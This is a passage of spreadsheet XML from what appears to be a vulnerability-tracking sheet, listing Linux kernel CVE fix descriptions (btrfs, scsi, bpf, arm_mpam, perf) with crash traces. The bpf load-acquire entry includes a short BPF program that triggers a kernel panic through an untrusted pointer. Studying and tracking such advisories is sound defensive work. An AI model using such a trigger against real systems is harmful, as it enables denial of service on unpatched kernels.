      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90262</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr"/>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr"/>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: retry verity reads for not-uptodate Merkle folios
btrfs_read_merkle_tree_page() can find a folio in the mapping that is not
uptodate.  After taking the folio lock, the current code treats that state
as a read error and returns -EIO.
That can make a previous transient read failure sticky.  If the failed read
left a not-uptodate folio in the mapping, later callers find that folio and
fail instead of retrying the read.
Keep the existing page-cache insertion and locking order, but retry the
Merkle item read when a not-uptodate folio is found in the mapping.  Also
unlock the folio when read_key_bytes() fails so that a later caller can
lock it and retry the read.</t>
        </is>
      </c>
      <c r="T630" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90262</t>
        </is>
      </c>
    </row>
    <row r="631">
      <c r="A631" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B631" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C631" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90263</t>
        </is>
      </c>
      <c r="D631" s="5" t="inlineStr"/>
      <c r="E631" s="5" t="inlineStr"/>
      <c r="F631" s="5" t="inlineStr"/>
      <c r="G631" s="5" t="inlineStr"/>
      <c r="H631" s="5" t="inlineStr"/>
      <c r="I631" s="5" t="inlineStr"/>
      <c r="J631" s="5" t="inlineStr"/>
      <c r="K631" s="5" t="inlineStr"/>
      <c r="L631" s="5" t="inlineStr"/>
      <c r="M631" s="5" t="inlineStr"/>
      <c r="N631" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O631" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P631" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q631" s="5" t="inlineStr"/>
      <c r="R631" s="5" t="inlineStr"/>
      <c r="S631" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: check if root is readonly when setting posix acl
For a filesystem which has btrfs read-only property set to true, all
write operations including acl and xattr should be denied. However, acl
can still be set even if btrfs ro property is true.
This happens because no function on the set_acl code path checks the root
is readonly or not. It was checked in btrfs_setxattr_trans() but got
removed in commit 353c2ea735e4 ("btrfs: remove redundant readonly root
check in btrfs_setxattr_trans")
That commit didn't check if all the callers properly check the root's
read-only flag. A previous fix is commit b51111271b03 ("btrfs: check if
root is readonly while setting security xattr").
Always check if the root is read-only before performing the set acl
operation.</t>
        </is>
      </c>
      <c r="T631" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90263</t>
        </is>
      </c>
    </row>
    <row r="632">
      <c r="A632" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B632" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C632" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90264</t>
        </is>
      </c>
      <c r="D632" s="5" t="inlineStr"/>
      <c r="E632" s="5" t="inlineStr"/>
      <c r="F632" s="5" t="inlineStr"/>
      <c r="G632" s="5" t="inlineStr"/>
      <c r="H632" s="5" t="inlineStr"/>
      <c r="I632" s="5" t="inlineStr"/>
      <c r="J632" s="5" t="inlineStr"/>
      <c r="K632" s="5" t="inlineStr"/>
      <c r="L632" s="5" t="inlineStr"/>
      <c r="M632" s="5" t="inlineStr"/>
      <c r="N632" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O632" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P632" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q632" s="5" t="inlineStr"/>
      <c r="R632" s="5" t="inlineStr"/>
      <c r="S632" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: always wait for ordered extents to avoid OE races
[BUG]
Syzbot reported a bug that there can be conflicting OEs for the same
range:
  BTRFS critical (device loop4): panic in insert_ordered_extent:264: overlapping ordered extents, existing oe file_offset 16384 num_bytes 430080 flags 0x1089, new oe file_offset 16384 num_bytes 430080 flags 0x80 (errno=-17 Object alrea[  179.162726][ T6897] BTRFS critical (device loop4): panic in insert_ordered_extent:264: overlapping ordered extents, existing oe file_offset 16384 num_bytes 430080 flags 0x1089, new oe file_offset 16384 num_bytes 430080 flags 0x80 (errno=-17 Object already exists)
  ------------[ cut here ]------------
  kernel BUG at fs/btrfs/ordered-data.c:264!
  Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/09/2026
  RIP: 0010:btrfs_alloc_ordered_extent+0x943/0xad0
  Call Trace:
   &lt;TASK&gt;
   cow_file_range+0x744/0x12a0
   fallback_to_cow+0x5ea/0xa00
   run_delalloc_nocow+0x110c/0x17a0
   btrfs_run_delalloc_range+0xbe4/0x1c20
   writepage_delalloc+0x104d/0x1ba0
   btrfs_writepages+0x1667/0x28b0
   do_writepages+0x338/0x560
   filemap_fdatawrite_range+0x1f2/0x300
   btrfs_fdatawrite_range+0x54/0xf0
   btrfs_direct_write+0x6a0/0xc30
   btrfs_do_write_iter+0x329/0x790
   do_iter_readv_writev+0x624/0x8d0
   vfs_writev+0x34c/0x990
   __se_sys_pwritev2+0x17a/0x2a0
   do_syscall_64+0x174/0x580
   entry_SYSCALL_64_after_hwframe+0x77/0x7f
   &lt;/TASK&gt;
  ---[ end trace 0000000000000000 ]---
[CAUSE]
Since commit ff66fe666233 ("btrfs: fix incorrect buffered IO fallback
for append direct writes"), if the direct IO finished short, we will
revert the isize back to the original one, so that append writes can be
respected during the buffered fallback.
Normally we rely on lock_and_cleanup_extent_if_need() function during
buffered writeback to wait for any existing ordered extents.
But that ordered extent waiting only happens if the start_pos is inside
the isize.
Since we have reverted the isize during failed direct IO, we will not
wait for any ordered extents.
This means we can have a race where the direct IO OE is still in the
tree, finished but not yet removed, then we're inserting the OE for the
buffered write, causing the above crash.
[FIX]
Make the OE wait to be unconditional, to handle the reverted isize
situation.
And since lock_and_cleanup_extent_if_need() now either lock the
extents or return -EAGAIN, also remove the branches that handles
no-extent-locked cases, and rename it to remove the "_if_need" suffix.
The following micro benchmark shows the runtime difference for
btrfs_buffered_write(), doing `xfs_io -f -c "pwrite 0 1m"` workload,
all values are the average runtime in nano seconds.
      function runtime              |   before    |     after
 -----------------------------------+-------------+---------------
 lock_and_cleanup_extent_if_need()  |     58.2    |    183.0
 btrfs_buffered_write()             |   2115.6    |   2973.3
The overall runtime of btrfs_buffered_write() is still pretty
tiny (still less than 3 micro seconds), I'd say the extra cost is still
acceptable.
An alternative to fix this problem is to wait ordered extents during
iomap_end() where the isize revert is done.
But that solution will break nowait requirement, as if a nowait direct
IO finished short, we have to wait for the OEs unconditionally or the
next append buffered IO can still hit the same problem.
So here we have to move the wait cost to buffered write, but at least
the code is slightly more streamline.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90264</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90265</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="inlineStr"/>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: defrag: fix deadlock between defrag and delalloc space reservation
While running fsstress with autodefrag and flushoncommit, hit a deadlock
due to the fact that defrag reserves delalloc space while it's holding
dirty and locked folios, besides the extent range lock. The stack traces
are the following:
   [958.624] task:kworker/u50:3   state:D stack:0     pid:20365 tgid:20365 ppid:2      task_flags:0x4208060 flags:0x00080000
   [958.626] Workqueue: events_unbound btrfs_async_reclaim_metadata_space [btrfs]
   [958.627] Call Trace:
   [958.628]  &lt;TASK&gt;
   [958.628]  __schedule+0x4be/0x10f0
   [958.629]  ? preempt_count_add+0x69/0xa0
   [958.630]  schedule+0x26/0xd0
   [958.631]  wait_current_trans+0x102/0x160 [btrfs]
   [958.632]  ? __pfx_autoremove_wake_function+0x10/0x10
   [958.633]  start_transaction+0x374/0x900 [btrfs]
   [958.634]  btrfs_commit_current_transaction+0x1d/0x70 [btrfs]
   [958.635]  flush_space+0xca/0x5e0 [btrfs]
   [958.636]  ? _raw_spin_unlock+0x15/0x30
   [958.637]  ? btrfs_reduce_alloc_profile+0x8c/0x190 [btrfs]
   [958.639]  ? _raw_spin_unlock+0x15/0x30
   [958.640]  ? calc_available_free_space.isra.0+0x6f/0x110 [btrfs]
   [958.641]  do_async_reclaim_metadata_space+0x84/0x190 [btrfs]
   [958.642]  btrfs_async_reclaim_metadata_space+0x64/0x80 [btrfs]
   [958.644]  process_one_work+0x19d/0x3a0
   [958.644]  worker_thread+0x1c4/0x330
   [958.645]  ? __pfx_worker_thread+0x10/0x10
   [958.646]  kthread+0xfc/0x130
   [958.647]  ? __pfx_kthread+0x10/0x10
   [958.648]  ret_from_fork+0x1f7/0x2c0
   [958.648]  ? __pfx_kthread+0x10/0x10
   [958.649]  ret_from_fork_asm+0x1a/0x30
   [958.650]  &lt;/TASK&gt;
   [958.651] task:kworker/u49:7   state:D stack:0     pid:52990 tgid:52990 ppid:2      task_flags:0x4208060 flags:0x00080000
   [958.653] Workqueue: writeback wb_workfn (flush-btrfs-334)
   [958.655] Call Trace:
   [958.655]  &lt;TASK&gt;
   [958.656]  __schedule+0x4be/0x10f0
   [958.657]  ? __blk_flush_plug+0xe9/0x140
   [958.658]  schedule+0x26/0xd0
   [958.658]  io_schedule+0x42/0x70
   [958.659]  folio_wait_bit_common+0x12b/0x330
   [958.660]  ? folio_wait_bit_common+0x100/0x330
   [958.662]  ? __pfx_wake_page_function+0x10/0x10
   [958.663]  extent_write_cache_pages+0x599/0x830 [btrfs]
   [958.664]  ? acpi_fwnode_get_reference_args+0x1fa/0x270
   [958.665]  btrfs_writepages+0x77/0x130 [btrfs]
   [958.666]  ? __pfx_end_bbio_data_write+0x10/0x10 [btrfs]
   [958.667]  do_writepages+0xc6/0x160
   [958.668]  __writeback_single_inode+0x42/0x310
   [958.669]  writeback_sb_inodes+0x231/0x570
   [958.670]  wb_writeback+0x8a/0x340
   [958.671]  wb_workfn+0xbf/0x450
   [958.672]  ? finish_task_switch.isra.0+0xc1/0x350
   [958.673]  process_one_work+0x19d/0x3a0
   [958.673]  worker_thread+0x1c4/0x330
   [958.674]  ? __pfx_worker_thread+0x10/0x10
   [958.675]  kthread+0xfc/0x130
   [958.676]  ? __pfx_kthread+0x10/0x10
   [958.676]  ret_from_fork+0x1f7/0x2c0
   [958.677]  ? __pfx_kthread+0x10/0x10
   [958.678]  ret_from_fork_asm+0x1a/0x30
   [958.679]  &lt;/TASK&gt;
   [958.679] task:btrfs-cleaner   state:D stack:0     pid:296750 tgid:296750 ppid:2      task_flags:0x208040 flags:0x00080000
   [958.681] Call Trace:
   [958.682]  &lt;TASK&gt;
   [958.682]  __schedule+0x4be/0x10f0
   [958.683]  schedule+0x26/0xd0
   [958.684]  handle_reserve_ticket+0x1b9/0x2c0 [btrfs]
   [958.685]  ? __pfx_autoremove_wake_function+0x10/0x10
   [958.686]  reserve_bytes+0x283/0x4c0 [btrfs]
   [958.687]  btrfs_reserve_metadata_bytes+0x18/0xb0 [btrfs]
   [958.688]  btrfs_delalloc_reserve_metadata+0x121/0x320 [btrfs]
   [958.690]  btrfs_delalloc_reserve_space+0x46/0xb0 [btrfs]
   [958.691]  btrfs_defrag_file+0x903/0x1110 [btrfs]
   [958.692]  btrfs_run_defrag_inodes+0x334/0x430 [btrfs]
   [958.694]  cleaner_kthread+0x97/0x1c0 [btrfs]
   [958.694]  ? __pfx_cleaner_kthread+0x10/0x10 [btrfs]
   [958.696]  kthread+0xfc/0x130
   [958.696]  ? __pfx_kthread+0x10/0x10
   [958.697]  ret_
---truncated---</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90265</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90266</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: don't force read-only on transient -EAGAIN from reloc merge
On a zoned FS, btrfs_delayed_refs_rsv_refill() returns -EAGAIN whenever
the over-committed metadata plus the zone_unusable bytes exceeds the
usable size in a metadata block-group to avoid heavy over-commit of
metadata and early ENOSPC in one transaction.
If this happens while doing reclaim, the transaction is getting aborted.
Treat -EAGAIN as a soft, retryable condition in case of block-group
reclaim.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90266</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90267</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="inlineStr"/>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: sd: Fix special_vec mempool leak when scsi_alloc_sgtables() fails
sd_set_special_bvec() allocates a special payload page for UNMAP and
WRITE SAME commands. If scsi_alloc_sgtables() fails afterward in
sd_setup_unmap_cmnd() or sd_setup_write_same{10,16}_cmnd(), the SCSI
midlayer does not call uninit_command() because RQF_DONTPREP is not set
yet, leaking the page.
Call sd_uninit_command() on error, and clear RQF_SPECIAL_PAYLOAD after
freeing the page.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90267</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90268</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="inlineStr"/>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: sd: Fix error handling in sd_probe() after large pool creation failure
After device_add(&amp;sdkp-&gt;disk_dev) succeeds, sd_large_pool_create()
failure must unregister disk_dev and let scsi_disk_release() free
sdkp. Going through out_free_index kfree()s an already registered device
and leaks the sysfs entry.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90268</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90269</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject load-acquire from pointers requiring fault protection
A BPF_LOAD_ACQ is not rewritten to a BPF_PROBE_MEM load by the verifier,
unlike a regular BPF_LDX, so the JIT emits a plain load with no exception
table entry and a fault panics the kernel instead of being handled.
Reject the source pointer types that a BPF_LDX would have had that fault
protection applied to, i.e. the ones bpf_convert_ctx_accesses() turns
into BPF_PROBE_MEM: a bare PTR_TO_BTF_ID, PTR_TO_BTF_ID | PTR_UNTRUSTED,
PTR_TO_BTF_ID | MEM_ALLOC | PTR_UNTRUSTED and PTR_TO_MEM | MEM_RDONLY |
PTR_UNTRUSTED.
This is reachable e.g. by loading -&gt;mm out of a trusted task_struct
yields an untrusted pointer to mm_struct, and it is NULL for a kernel
thread:
  [...]
  SEC("tp_btf/sched_switch")
  int BPF_PROG(demo, bool preempt, struct task_struct *prev,
               struct task_struct *next)
  {
      struct mm_struct *mm = next-&gt;mm;  /* untrusted */
      out_ldx = (__u64)mm-&gt;pgd;         /* BPF_LDX      */
      out_acq = load_acquire(&amp;mm-&gt;pgd); /* BPF_LOAD_ACQ */
      return 0;
  }
  [...]
Both dereference the same pointer, but only the BPF_LDX is protected
(x86-64 JIT, jump targets shown prog-relative):
  [...]
  ; out_ldx = (__u64)mm-&gt;pgd;
  17:   movq    $-10485760, %r10
  1e:   movq    %rsi, %r11
  21:   addq    $184, %r11
  28:   subq    %r10, %r11
  2b:   movabsq $140737498841088, %r10
  35:   cmpq    %r10, %r11
  38:   ja      0x3e                 &lt;-- kernel addr?
  3a:   xorl    %edi, %edi           &lt;-- no: dst = 0, skip the load
  3c:   jmp     0x45
  3e:   movq    184(%rsi), %rdi      &lt;-- yes: load + extable entry
  [...]
  ; load_acquire(&amp;mm-&gt;pgd)
  53:	movq    %rsi, %rdi
  56:	movq    184(%rdi), %rax       &lt;-- no check, no extable entry
  [...]
Note that BPF_PROBE_MEM is not visible in a bpftool xlated dump, as
bpf_insn_prepare_dump() rewrites it back to BPF_MEM.
A PTR_TRUSTED pointer is deliberately not on the list. Such a load is
not converted either, but it does not need to be, since the pointer is
guaranteed live, so load-acquire from it stays allowed.
The check is gated on BPF_LOAD_ACQ so that atomic RMW and store-release
error messages are unchanged; writes (RMW / store-release) to such
pointers are already rejected elsewhere, so only load-acquire needs this.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90269</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90270</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="inlineStr"/>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Disable driver unbind to avoid UAF
When a user unbinds an MSC and that MSC is the only MSC left for a
component then the corresponding mpam_component will be freed. If the user
then goes on to read the schemata file in the resctrl filesystem then the
mpam_component will be accessed from resctrl_arch_get_config() leading to a
use after free.
As the MPAM driver is not a module the unbind sysfs interface is the only
way to trigger the remove. Instead of dealing with the complexity of
allowing some unused MSC to unbind just remove the unbind sysfs interface.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90270</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90271</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="inlineStr"/>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Fix a NULL pointer dereference on unbinding after an error interrupt
If a user unbinds an MSC after mpam_disable() has been run in response
to an error interrupt then a dereference of a NULL pointer occurs as
mpam_disable() sets the drvdata to NULL. Add an early return to the driver
remove callback to avoid this.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90271</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90272</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="inlineStr"/>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: arm_pmuv3: Zero initialize hw_id branch stack field
PERF_SAMPLE_BRANCH_HW_INDEX is supported by BRBE so hw_id is passed to
userspace, but it's never set by the BRBE driver. Zero initialize it as
it should be according to the docs:
   * For the architectures whose raw branch records are
   * already stored in age order, the hw_idx should be 0.
It's probably too risky to remove PERF_SAMPLE_BRANCH_HW_INDEX from BRBE
now in case anyone is setting it and reading the value, but zero
initializing the whole struct also protects against the same issue with
new fields that are added in the future.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90272</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90273</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
